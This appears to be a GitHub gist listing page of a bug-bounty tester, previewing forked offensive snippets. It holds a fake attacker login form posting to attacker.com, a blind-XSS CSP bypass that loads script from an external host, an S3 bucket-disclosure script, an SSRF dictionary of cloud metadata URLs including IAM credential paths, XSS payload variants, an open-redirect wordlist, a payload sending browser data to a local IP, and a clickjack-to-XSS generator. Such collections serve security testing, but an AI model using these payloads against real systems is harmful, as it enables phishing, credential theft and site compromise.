Vishal Panchani gujjuboy10x00
gujjuboy10x00
/ gist:5b3e9a996dbe00557d4d10c87beb4258
Last active
February 6, 2024 03:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: Attacker Login Page | |
| description: '<div class="login-form"> | |
| <div class="heading"> | |
| <h1>XSS : Attacker Login</h1> | |
| </div> | |
| <div class="form-container"> | |
| <form action="https://attacker.com/login" method="post" class="form-signin"> |
gujjuboy10x00
/ gist:bb80ca47943d53cc9462716283212181
Last active
August 31, 2018 15:48
— forked from Rhynorater/gist:311cf3981fda8303d65c27316e69209f
BXSS - CSP Bypass with Inline and Eval
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) |
gujjuboy10x00
/ bucket-disclose.sh
Created
August 4, 2018 11:16
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
gujjuboy10x00
/ cloud_metadata.txt
Created
June 6, 2018 06:15
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
gujjuboy10x00
/ alert.js
Created
April 5, 2018 18:08
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
gujjuboy10x00
/ open_redirect_wordlist.txt
Created
January 21, 2018 18:30
— forked from EdOverflow/open_redirect_wordlist.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /http://example.com | |
| /%5cexample.com | |
| /%2f%2fexample.com | |
| /example.com/%2f%2e%2e | |
| /http:/example.com | |
| /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com | |
| /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com | |
| /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com | |
| /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com | |
| /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com |
gujjuboy10x00
/ xss using HTMLinjection
Last active
June 6, 2018 09:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <style>body{margin:0}.overlay{position:fixed;top:0;left:0;z-index:999;height:100vh;width:100vw;background:rgba(0,0,0,0.5)}.alert{width:300px;padding:0 20px 0 0px;position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);background:#fff}.alert p{color:#000 !important;padding:45px;text-align:center;font-family:sans-serif}.ok{background:#eee;width:100%;height:30px;padding:10px 10px}.ok button{float:right;padding:0 25px;margin-right:5px}</style><div class="overlay"><div class="alert"><p>1</p><div class="ok"><button>OK</button></div></div></div> | |
| data:text/html,<a href="javascript:'img src=e onerror=alert()>';">click</a> | |
| <a href="javascript:{httpRequest=new XMLHttpRequest();httpRequest.open('POST','http://192.168.1.109:8090');httpRequest.send(navigator.appVersion);}">POC</a> |
gujjuboy10x00
/ cxp.py
Created
November 17, 2017 16:01
— forked from vishwaraj101/cxp.py
clickjack to xss poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| print "Clickjack to Xss" | |
| vector=raw_input('xss vector--> ') #xss payload | |
| html=raw_input('Custom Iframe Code--> ') #custom iframe code | |
| fo=open('exploit.html','w') #creating html file | |
| source_code="""<html><body> | |
| <h1>Clickjack to exploit self xss </h1> | |
| <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div> | |
| """%(vector) |